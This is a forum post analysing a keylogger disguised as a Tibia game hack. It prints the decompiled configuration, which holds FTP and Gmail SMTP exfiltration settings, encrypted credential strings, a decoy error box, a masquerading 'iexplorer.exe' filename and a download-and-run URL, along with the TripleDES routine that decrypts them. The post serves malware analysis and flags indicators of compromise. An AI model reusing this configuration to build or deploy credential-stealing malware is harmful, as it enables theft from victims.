Blahhh
12-12-2013, 11:05 AM
yup this contains a keylogger, a screen capturer and all the other shit you can imagine
decompiled it and found some encrypted strings which probably decrypt to his email/password/ftp etc:
' Static initializer of Module1, as emitted by a decompiler: it only assigns
' constants to shared fields. This is the sample's embedded configuration.
' Names such as Field_NN and the Greek identifiers are obfuscator/decompiler
' output, so the role of each field has to be inferred from its value.
' NOTE(review): every role given below is an inference from the literal alone,
' to be confirmed against the code that reads the field.
Shared Sub New()
' Boolean switches; nothing in this listing shows which feature each one gates.
Module1.Field_12 = False
Module1.Field_18 = False
Module1.Field_10 = False
Module1.Field_11 = False
Module1.Field_9 = False
Module1.ΨεΔΧΛσ = False
' Numeric-looking settings and short opaque strings; meaning not visible here.
Module1.Field_7 = "20"
Module1.ζσπκβμ = "AaD"
Module1.ΡΥτΔςω = 4
Module1.Field_23 = "ιΥηΨ"
' presumably a registry hive selector (HKCU) used for persistence; confirm
Module1.Field_19 = "CurrentUser"
Module1.Field_17 = "χδΙΓδΟ"
' Random-looking 10-character string; candidate for the `key` argument of the
' decrypt routine posted with this listing. TODO confirm at the call sites.
Module1.Field_16 = "kgUofWkudc"
' File name resembling the browser binary (the real one is iexplore.exe);
' presumably the name the sample installs or runs under. Host-based IoC candidate.
Module1.βτξΦΙε = "iexplorer.exe"
' "+...+" values look like builder template tokens that were never substituted.
Module1.Field_14 = "+SDDate+"
Module1.Field_6 = False
' Three strings that look like a decoy message box: title, text, and "16",
' which matches MsgBoxStyle.Critical. Presumably shown to the victim; confirm.
Dim sArr1 As String() = New string() { _
"Tibia", _
"Tibia client do not match (xp000000256) error", _
"16" }
Module1.Message = sArr1
Module1.μΓνθψΠυΝ = "+DelOff+"
Module1.ΠΓπΨξΞζς = False
Module1.ΖΧεΣιψπτ = True
Module1.ΔΩνΤνδΓΗ = False
Module1.Field_4 = "10"
Module1.Field_21 = False
' Second random-looking 10-character string; same key-candidate caveat as Field_16.
Module1.οΒΚΖΣΛΖς = "QDdzMaIZMQ"
Module1.θΠΠΝΝΤ = False
' URL of an executable on a placeholder-looking host; presumably a
' download-and-run setting left at its default value. Confirm it is unused.
Module1.Field_13 = "http://www.exampleserver.com/directfile.exe"
Module1.Field_3 = False
' Second executable name; presumably the dropped or original file name. IoC candidate.
Module1.ΡδΠΔενψ = "Lighthack.exe"
Module1.Field_20 = True
Module1.ΟΗΝαΕΞγα = False
' Base64 ciphertext. The same value is assigned again to Field_15 below.
Module1.ΒεηΟΟμμσ = "uLKyKkBLOQQmiHVo96CGxw=="
' FTP host name: one candidate exfiltration channel. Network IoC.
Module1.Field_26 = "ftp.drivehq.com"
Module1.Field_15 = "uLKyKkBLOQQmiHVo96CGxw=="
Module1.Field_5 = ""
' SMTP host and, further down, "587" (the mail submission port): a second
' candidate exfiltration channel. Outbound SMTP submission from a process
' that is not a mail client is a useful detection signal.
Module1.ωΕνξθξε = "smtp.gmail.com"
' Base64 ciphertext, assigned again to ΤθΙΗωΠξ below. The space inside the
' literal is probably a line-wrap artifact of the forum paste; verify against
' the binary before decoding.
Module1.Field_22 = "4ag2dH0fb2q2Bfu4SJcDCBv+VUpWO7KWECYo0WNzB8a5L4+8Ty e48w=="
' Third distinct Base64 ciphertext in the configuration.
Module1.νΛΣΥΥθι = "57WaTtjpcHU1yZogYRNd9mOKAAsI9d7UgYrPe8Tyag8="
Module1.ΤθΙΗωΠξ = "4ag2dH0fb2q2Bfu4SJcDCBv+VUpWO7KWECYo0WNzB8a5L4+8Ty e48w=="
Module1.ΛΚζιγγΦ = "587"
' Text fragments that look like report/log formatting. "Active Window:"
' matches the foreground-title tracking state at the end of this initializer.
' "- Project Neptune" presumably names the builder that produced the sample; confirm.
Module1.ΣμΣυΤψτ = "Active Window:"
Module1.ΔΗυιλΕο = "- Project Neptune"
Module1.χςςΔΔΚΜ = True
Module1.ΦςΣΕΙΥΒ = True
Module1.τΩαΟΥΠΛ = True
Module1.Field_24 = True
' Runtime state reset to empty values. The names suggest a keyboard hook
' handle, the last seen foreground window title and a hook callback, which is
' consistent with key capture. Inferred from the names only.
Module1.KeyboardHandle = CType(0, IntPtr)
Module1.LastCheckedForegroundTitle = ""
Module1.callback = Nothing
End Sub
Also found the decrypt function.
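''' <summary>
''' Decrypts one Base64-encoded configuration string of the sample, so an
''' analyst can recover the embedded settings offline from the static values.
''' </summary>
''' <param name="value">Base64 text of the ciphertext.</param>
''' <param name="key">Password from which the TripleDES key is derived.</param>
''' <returns>The decrypted bytes decoded as UTF-8.</returns>
''' <remarks>
''' The scheme is TripleDES with an all-zero IV and a 128-bit key produced by
''' PasswordDeriveBytes.CryptDeriveKey("RC2", "MD5", ...). The key material is
''' a constant stored next to the ciphertext, so this is obfuscation rather
''' than protection.
'''
''' The decompiled listing declared its arrays as New byte(8), New byte(0) and
''' New byte(Length - 1 + 1). In VB the number is an upper bound, which would
''' give a 9-byte IV (rejected by TripleDES, whose block is 8 bytes) and one
''' trailing NUL in the result. The decompiler appears to have printed element
''' counts, so the bounds below are written as the VB equivalents of 8, 0 and
''' Length elements.
''' </remarks>
Public Shared Function ΓΠζαδΔ(ByVal value As String, ByVal key As String) As String
    Using tripleDes As New TripleDESCryptoServiceProvider()
        ' 8 zero bytes: TripleDES requires an IV of exactly one 64-bit block.
        tripleDes.IV = New Byte(7) {}

        ' Empty salt (element count 0 in the decompiled output).
        Dim keySource As PasswordDeriveBytes = New PasswordDeriveBytes(key, New Byte() {})
        tripleDes.Key = keySource.CryptDeriveKey("RC2", "MD5", 128, New Byte(7) {})

        Dim cipherBytes As Byte() = Convert.FromBase64String(value)

        Using plainStream As New MemoryStream(cipherBytes.Length)
            Using decryptStream As New CryptoStream(plainStream, tripleDes.CreateDecryptor(), CryptoStreamMode.Write)
                decryptStream.Write(cipherBytes, 0, cipherBytes.Length)
                ' Flushes the last block and strips the padding.
                decryptStream.FlushFinalBlock()

                ' ToArray returns exactly the bytes written, so no spare
                ' element ends up in the decoded string.
                Return Encoding.UTF8.GetString(plainStream.ToArray())
            End Using
        End Using
    End Using
End Function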